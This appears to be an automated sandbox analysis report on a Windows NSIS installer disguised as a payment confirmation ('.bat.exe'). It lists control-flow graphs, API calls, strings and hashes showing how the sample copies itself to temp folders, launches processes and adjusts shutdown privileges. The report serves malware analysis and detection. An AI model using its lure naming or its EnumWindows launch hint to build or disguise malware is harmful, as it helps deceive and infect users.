WritePrivateProfileStringW 4985->4987 4986->4985 6104 404737 lstrcpynW lstrlenW 6110 4014b8 6111 4014be 6110->6111 6112 401389 2 API calls 6111->6112 6113 4014c6 6112->6113 4988 402439 4989 402441 4988->4989 4990 40246c 4988->4990 4991 402deb 21 API calls 4989->4991 4992 402dab 21 API calls 4990->4992 4993 402448 4991->4993 4994 402473 4992->4994 4996 402452 4993->4996 4997 402480 4993->4997 5000 402e69 4994->5000 4998 402dab 21 API calls 4996->4998 4999 402459 RegDeleteValueW RegCloseKey 4998->4999 4999->4997 5001 402e76 5000->5001 5002 402e7d 5000->5002 5001->4997 5002->5001 5004 402eae 5002->5004 5005 4064ef RegOpenKeyExW 5004->5005 5006 402edc 5005->5006 5007 402f91 5006->5007 5008 402ee6 5006->5008 5007->5001 5009 402eec RegEnumValueW 5008->5009 5013 402f0f 5008->5013 5010 402f76 RegCloseKey 5009->5010 5009->5013 5010->5007 5011 402f4b RegEnumKeyW 5012 402f54 RegCloseKey 5011->5012 5011->5013 5014 406a76 5 API calls 5012->5014 5013->5010 5013->5011 5013->5012 5015 402eae 6 API calls 5013->5015 5016 402f64 5014->5016 5015->5013 5017 402f86 5016->5017 5018 402f68 RegDeleteKeyW 5016->5018 5017->5007 5018->5007 6114 40173a 6115 402dab 21 API calls 6114->6115 6116 401741 SearchPathW 6115->6116 6117 40175c 6116->6117 6118 401d3d 6119 402d89 21 API calls 6118->6119 6120 401d44 6119->6120 6121 402d89 21 API calls 6120->6121 6122 401d50 GetDlgItem 6121->6122 6123 40263d 6122->6123

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 403645-403697 SetErrorMode GetVersionExW 1 4036d1-4036d6 0->1 2 403699-4036c9 GetVersionExW 0->2 3 4036d8 1->3 4 4036de-403720 1->4 2->1 3->4 5 403722-40372a call 406a76 4->5 6 403733 4->6 5->6 11 40372c 5->11 8 403738-40374c call 406a06 lstrlenA 6->8 13 40374e-40376a call 406a76 * 3 8->13 11->6 20 40377b-4037df #17 OleInitialize SHGetFileInfoW call 406682 GetCommandLineW call 406682 13->20 21 40376c-403772 13->21 28 4037e1-4037e3 20->28 29 4037e8-4037fc call 405f7e CharNextW 20->29 21->20 25 403774 21->25 25->20 28->29 32 4038f7-4038fd 29->32 33 403801-403807 32->33 34 403903 32->34 35 403810-403817 33->35 36 403809-40380e 33->36 37 403917-403931 GetTempPathW call 403614 34->37 38 403819-40381e 35->38 39 40381f-403823 35->39 36->35 36->36 47 403933-403951 GetWindowsDirectoryW lstrcatW call 403614 37->47 48 403989-4039a3 DeleteFileW call 4030d5 37->48 38->39 41 4038e4-4038f3 call 405f7e 39->41 42 403829-40382f 39->42 41->32 59 4038f5-4038f6 41->59 45 403831-403838 42->45 46 403849-403882 42->46 52 40383a-40383d 45->52 53 40383f 45->53 54 403884-403889 46->54 55 40389f-4038d9 46->55 47->48 62 403953-403983 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403614 47->62 64 403b90-403ba0 call 403c62 OleUninitialize 48->64 65 4039a9-4039af 48->65 52->46 52->53 53->46 54->55 61 40388b-403893 54->61 57 4038e1-4038e3 55->57 58 4038db-4038df 55->58 57->41 58->57 63 403905-403912 call 406682 58->63 59->32 66 403895-403898 61->66 67 40389a 61->67 62->48 62->64 63->37 77 403ba2-403bb2 call 405ce2 ExitProcess 64->77 78 403bc6-403bcc 64->78 70 4039b5-4039c0 call 405f7e 65->70 71 403a48-403a4f call 403d54 65->71 66->55 66->67 67->55 82 4039c2-4039f7 70->82 83 403a0e-403a18 70->83 80 403a54-403a58 71->80 84 403c4a-403c52 78->84 85 403bce-403be4 GetCurrentProcess OpenProcessToken 78->85 80->64 91 4039f9-4039fd 82->91 86 403a1a-403a28 call 406059 83->86 87 403a5d-403a83 call 405c4d lstrlenW call 406682 83->87 88 403c54 84->88 89 403c58-403c5c ExitProcess 84->89 92 403be6-403c14 LookupPrivilegeValueW AdjustTokenPrivileges 85->92 93 403c1a-403c28 call 406a76 85->93 86->64 106 403a2e-403a44 call 406682 * 2 86->106 110 403a94-403aac 87->110 111 403a85-403a8f call 406682 87->111 88->89 97 403a06-403a0a 91->97 98 4039ff-403a04 91->98 92->93 104 403c36-403c41 ExitWindowsEx 93->104 105 403c2a-403c34 93->105 97->91 99 403a0c 97->99 98->97 98->99 99->83 104->84 108 403c43-403c45 call 40140b 104->108 105->104 105->108 106->71 108->84 116 403ab1-403ab5 110->116 111->110 118 403aba-403ae4 wsprintfW call 4066bf 116->118 122 403ae6-403aeb call 405bd6 118->122 123 403aed call 405c30 118->123 127 403af2-403af4 122->127 123->127 128 403b30-403b4f SetCurrentDirectoryW call 406442 CopyFileW 127->128 129 403af6-403b00 GetFileAttributesW 127->129 137 403b51-403b72 call 406442 call 4066bf call 405c65 128->137 138 403b8e 128->138 130 403b21-403b2c 129->130 131 403b02-403b0b DeleteFileW 129->131 130->116 134 403b2e 130->134 131->130 133 403b0d-403b1f call 405d8e 131->133 133->118 133->130 134->64 146 403b74-403b7e 137->146 147 403bb8-403bc4 CloseHandle 137->147 138->64 146->138 148 403b80-403b88 call 4069df 146->148 147->138 148->118 148->138
                                                            APIs
                                                            • SetErrorMode.KERNELBASE ref: 00403668
                                                            • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403693
                                                            • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004036A6
                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040373F
                                                            • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040377C
                                                            • OleInitialize.OLE32(00000000), ref: 00403783
                                                            • SHGetFileInfoW.SHELL32(00420F08,00000000,?,000002B4,00000000), ref: 004037A2
                                                            • GetCommandLineW.KERNEL32(00428A60,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037B7
                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe",00000020,"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe",00000000,?,00000008,0000000A,0000000C), ref: 004037F0
                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403928
                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403939
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403945
                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403959
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403961
                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403972
                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040397A
                                                            • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040398E
                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A67
                                                              • Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F
                                                            • wsprintfW.USER32 ref: 00403AC4
                                                            • GetFileAttributesW.KERNEL32(0042C800,C:\Users\user\AppData\Local\Temp\), ref: 00403AF7
                                                            • DeleteFileW.KERNEL32(0042C800), ref: 00403B03
                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403B31
                                                              • Part of subcall function 00406442: MoveFileExW.KERNEL32(?,?,00000005,00405F40,?,00000000,000000F1,?,?,?,?,?), ref: 0040644C
                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe,0042C800,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403B47
                                                              • Part of subcall function 00405C65: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
                                                              • Part of subcall function 00405C65: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B
                                                              • Part of subcall function 004069DF: FindFirstFileW.KERNELBASE(75923420,00425F98,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,004060A2,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0), ref: 004069EA
                                                              • Part of subcall function 004069DF: FindClose.KERNEL32(00000000), ref: 004069F6
                                                            • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403B95
                                                            • ExitProcess.KERNEL32 ref: 00403BB2
                                                            • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403BB9
                                                            • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BD5
                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403BDC
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BF1
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403C14
                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C39
                                                            • ExitProcess.KERNEL32 ref: 00403C5C
                                                              • Part of subcall function 00405C30: CreateDirectoryW.KERNELBASE(?,00000000,00403638,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405C36
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                            • String ID: "C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe$C:\Users\user\eftermodnendes\ringeagt$C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$user32::EnumWindows(i r1 ,i 0)$~nsu%X.tmp
                                                            • API String ID: 1813718867-3475534917
                                                            • Opcode ID: 0478bff6c520e1fcae09ae2a6132b709cffae3f0026663cdf2ec71cee886cdca
                                                            • Instruction ID: d2a3103bd0adf94391fd0ebfa47e937d37e61a7cc597b22c14a72094b2238e17
                                                            • Opcode Fuzzy Hash: 0478bff6c520e1fcae09ae2a6132b709cffae3f0026663cdf2ec71cee886cdca
                                                            • Instruction Fuzzy Hash: 4CF1E531604300AAD320AF759D05B2B7EE8AB8570AF11483FF585B22D1DB7C9A41CB6E

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 357 405d8e-405db4 call 406059 360 405db6-405dc8 DeleteFileW 357->360 361 405dcd-405dd4 357->361 362 405f4a-405f4e 360->362 363 405dd6-405dd8 361->363 364 405de7-405df7 call 406682 361->364 365 405ef8-405efd 363->365 366 405dde-405de1 363->366 370 405e06-405e07 call 405f9d 364->370 371 405df9-405e04 lstrcatW 364->371 365->362 369 405eff-405f02 365->369 366->364 366->365 372 405f04-405f0a 369->372 373 405f0c-405f14 call 4069df 369->373 375 405e0c-405e10 370->375 371->375 372->362 373->362 381 405f16-405f2a call 405f51 call 405d46 373->381 378 405e12-405e1a 375->378 379 405e1c-405e22 lstrcatW 375->379 378->379 380 405e27-405e43 lstrlenW FindFirstFileW 378->380 379->380 382 405e49-405e51 380->382 383 405eed-405ef1 380->383 397 405f42-405f45 call 405707 381->397 398 405f2c-405f2f 381->398 385 405e71-405e85 call 406682 382->385 386 405e53-405e5b 382->386 383->365 388 405ef3 383->388 399 405e87-405e8f 385->399 400 405e9c-405ea7 call 405d46 385->400 389 405ed0-405ee0 FindNextFileW 386->389 390 405e5d-405e65 386->390 388->365 389->382 396 405ee6-405ee7 FindClose 389->396 390->385 393 405e67-405e6f 390->393 393->385 393->389 396->383 397->362 398->372 401 405f31-405f40 call 405707 call 406442 398->401 399->389 402 405e91-405e9a call 405d8e 399->402 410 405ec8-405ecb call 405707 400->410 411 405ea9-405eac 400->411 401->362 402->389 410->389 412 405ec0-405ec6 411->412 413 405eae-405ebe call 405707 call 406442 411->413 412->389 413->389
                                                            APIs
                                                            • DeleteFileW.KERNELBASE(?,?,75923420,75922EE0,"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"), ref: 00405DB7
                                                            • lstrcatW.KERNEL32(00424F50,\*.*,00424F50,?,?,75923420,75922EE0,"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"), ref: 00405DFF
                                                            • lstrcatW.KERNEL32(?,0040A014,?,00424F50,?,?,75923420,75922EE0,"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"), ref: 00405E22
                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,00424F50,?,?,75923420,75922EE0,"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"), ref: 00405E28
                                                            • FindFirstFileW.KERNEL32(00424F50,?,?,?,0040A014,?,00424F50,?,?,75923420,75922EE0,"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"), ref: 00405E38
                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405ED8
                                                            • FindClose.KERNEL32(00000000), ref: 00405EE7
                                                            Strings
                                                            • \*.*, xrefs: 00405DF9
                                                            • "C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe", xrefs: 00405D97
                                                            • POB, xrefs: 00405DE7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                            • String ID: "C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"$POB$\*.*
                                                            • API String ID: 2035342205-1437108013
                                                            • Opcode ID: 3d2f7fed8d6250162ff3c39f7b63e528597fb1dc0209ffdda96aed75cda8f6cd
                                                            • Instruction ID: 5ad7ae4105776224b4bb644c15053e07d5ebc7bd6c5330578b1f64027da07968
                                                            • Opcode Fuzzy Hash: 3d2f7fed8d6250162ff3c39f7b63e528597fb1dc0209ffdda96aed75cda8f6cd
                                                            • Instruction Fuzzy Hash: 6F41D330400A15AACB21AB65CC49BBF7678EF41718F24417FF895B11C1D77C4A82DEAE

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 678 406da0-406da5 679 406e16-406e34 678->679 680 406da7-406dd6 678->680 683 40740c-407421 679->683 681 406dd8-406ddb 680->681 682 406ddd-406de1 680->682 684 406ded-406df0 681->684 685 406de3-406de7 682->685 686 406de9 682->686 687 407423-407439 683->687 688 40743b-407451 683->688 690 406df2-406dfb 684->690 691 406e0e-406e11 684->691 685->684 686->684 689 407454-40745b 687->689 688->689 692 407482-40748e 689->692 693 40745d-407461 689->693 694 406e00-406e0c 690->694 695 406dfd 690->695 696 406fe3-407001 691->696 705 406c24-406c2d 692->705 697 407610-40761a 693->697 698 407467-40747f 693->698 702 406e76-406ea4 694->702 695->694 700 407003-407017 696->700 701 407019-40702b 696->701 707 407626-407639 697->707 698->692 706 40702e-407038 700->706 701->706 703 406ec0-406eda 702->703 704 406ea6-406ebe 702->704 708 406edd-406ee7 703->708 704->708 709 406c33 705->709 710 40763b 705->710 712 40703a 706->712 713 406fdb-406fe1 706->713 711 40763e-407642 707->711 715 406eed 708->715 716 406e5e-406e64 708->716 717 406c3a-406c3e 709->717 718 406d7a-406d9b 709->718 719 406cdf-406ce3 709->719 720 406d4f-406d53 709->720 710->711 721 406fb6-406fba 712->721 722 40714b-407158 712->722 713->696 714 406f7f-406f89 713->714 729 4075ce-4075d8 714->729 730 406f8f-406fb1 714->730 740 406e43-406e5b 715->740 741 4075aa-4075b4 715->741 731 406f17-406f1d 716->731 732 406e6a-406e70 716->732 717->707 726 406c44-406c51 717->726 718->683 733 406ce9-406d02 719->733 734 40758f-407599 719->734 727 406d59-406d6d 720->727 728 40759e-4075a8 720->728 723 406fc0-406fd8 721->723 724 4075c2-4075cc 721->724 722->705 723->713 724->707 726->710 736 406c57-406c9d 726->736 739 406d70-406d78 727->739 728->707 729->707 730->722 737 406f7b 731->737 738 406f1f-406f3d 731->738 732->702 732->737 735 406d05-406d09 733->735 734->707 735->719 742 406d0b-406d11 735->742 743 406cc5-406cc7 736->743 744 406c9f-406ca3 736->744 737->714 745 406f55-406f67 738->745 746 406f3f-406f53 738->746 739->718 739->720 740->716 741->707 747 406d13-406d1a 742->747 748 406d3b-406d4d 742->748 752 406cd5-406cdd 743->752 753 406cc9-406cd3 743->753 749 406ca5-406ca8 GlobalFree 744->749 750 406cae-406cbc GlobalAlloc 744->750 751 406f6a-406f74 745->751 746->751 754 406d25-406d35 GlobalAlloc 747->754 755 406d1c-406d1f GlobalFree 747->755 748->739 749->750 750->710 756 406cc2 750->756 751->731 757 406f76 751->757 752->735 753->752 753->753 754->710 754->748 755->754 756->743 759 4075b6-4075c0 757->759 760 406efc-406f14 757->760 759->707 760->731
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3ef02b19721ac815a4354a2b384e5822db0a29b40c19b0eeafe3a712687496ea
                                                            • Instruction ID: 5203db86b2e08fd3ebfde089d8ff8c44169432d1db75552ad8ea7513f2b1afa9
                                                            • Opcode Fuzzy Hash: 3ef02b19721ac815a4354a2b384e5822db0a29b40c19b0eeafe3a712687496ea
                                                            • Instruction Fuzzy Hash: 64F16570D04229CBDF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A86CF45
                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(75923420,00425F98,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,004060A2,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0), ref: 004069EA
                                                            • FindClose.KERNEL32(00000000), ref: 004069F6
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\nsa1392.tmp, xrefs: 004069DF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsa1392.tmp
                                                            • API String ID: 2295610775-1847755183
                                                            • Opcode ID: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
                                                            • Instruction ID: 87b64c9cece2c57c139ea7904c9da033401fae8fb112df8880c97ca139bbac6e
                                                            • Opcode Fuzzy Hash: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
                                                            • Instruction Fuzzy Hash: EBD012716096205BD64067386E0C94B7A589F16331722CA36F06BF21E0D7348C628A9C

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 151 403d54-403d6c call 406a76 154 403d80-403db7 call 406550 151->154 155 403d6e-403d7e call 4065c9 151->155 159 403db9-403dca call 406550 154->159 160 403dcf-403dd5 lstrcatW 154->160 163 403dda-403e03 call 40402a call 406059 155->163 159->160 160->163 169 403e95-403e9d call 406059 163->169 170 403e09-403e0e 163->170 176 403eab-403ed0 LoadImageW 169->176 177 403e9f-403ea6 call 4066bf 169->177 170->169 171 403e14-403e3c call 406550 170->171 171->169 181 403e3e-403e42 171->181 179 403f51-403f59 call 40140b 176->179 180 403ed2-403f02 RegisterClassW 176->180 177->176 194 403f63-403f6e call 40402a 179->194 195 403f5b-403f5e 179->195 182 404020 180->182 183 403f08-403f4c SystemParametersInfoW CreateWindowExW 180->183 185 403e54-403e60 lstrlenW 181->185 186 403e44-403e51 call 405f7e 181->186 188 404022-404029 182->188 183->179 189 403e62-403e70 lstrcmpiW 185->189 190 403e88-403e90 call 405f51 call 406682 185->190 186->185 189->190 193 403e72-403e7c GetFileAttributesW 189->193 190->169 197 403e82-403e83 call 405f9d 193->197 198 403e7e-403e80 193->198 204 403f74-403f8e ShowWindow call 406a06 194->204 205 403ff7-403fff call 4057da 194->205 195->188 197->190 198->190 198->197 212 403f90-403f95 call 406a06 204->212 213 403f9a-403fac GetClassInfoW 204->213 210 404001-404007 205->210 211 404019-40401b call 40140b 205->211 210->195 216 40400d-404014 call 40140b 210->216 211->182 212->213 214 403fc4-403ff5 DialogBoxParamW call 40140b call 403ca4 213->214 215 403fae-403fbe GetClassInfoW RegisterClassW 213->215 214->188 215->214 216->195
                                                            APIs
                                                              • Part of subcall function 00406A76: GetModuleHandleA.KERNEL32(?,00000020,?,00403755,0000000C,?,?,?,?,?,?,?,?), ref: 00406A88
                                                              • Part of subcall function 00406A76: GetProcAddress.KERNEL32(00000000,?), ref: 00406AA3
                                                            • lstrcatW.KERNEL32(1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,75923420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe",00008001), ref: 00403DD5
                                                            • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\eftermodnendes\ringeagt,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,75923420), ref: 00403E55
                                                            • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\eftermodnendes\ringeagt,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000), ref: 00403E68
                                                            • GetFileAttributesW.KERNEL32(Call), ref: 00403E73
                                                            • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\eftermodnendes\ringeagt), ref: 00403EBC
                                                              • Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6
                                                            • RegisterClassW.USER32(00428A00), ref: 00403EF9
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403F11
                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F46
                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403F7C
                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,00428A00), ref: 00403FA8
                                                            • GetClassInfoW.USER32(00000000,RichEdit,00428A00), ref: 00403FB5
                                                            • RegisterClassW.USER32(00428A00), ref: 00403FBE
                                                            • DialogBoxParamW.USER32(?,00000000,00404102,00000000), ref: 00403FDD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
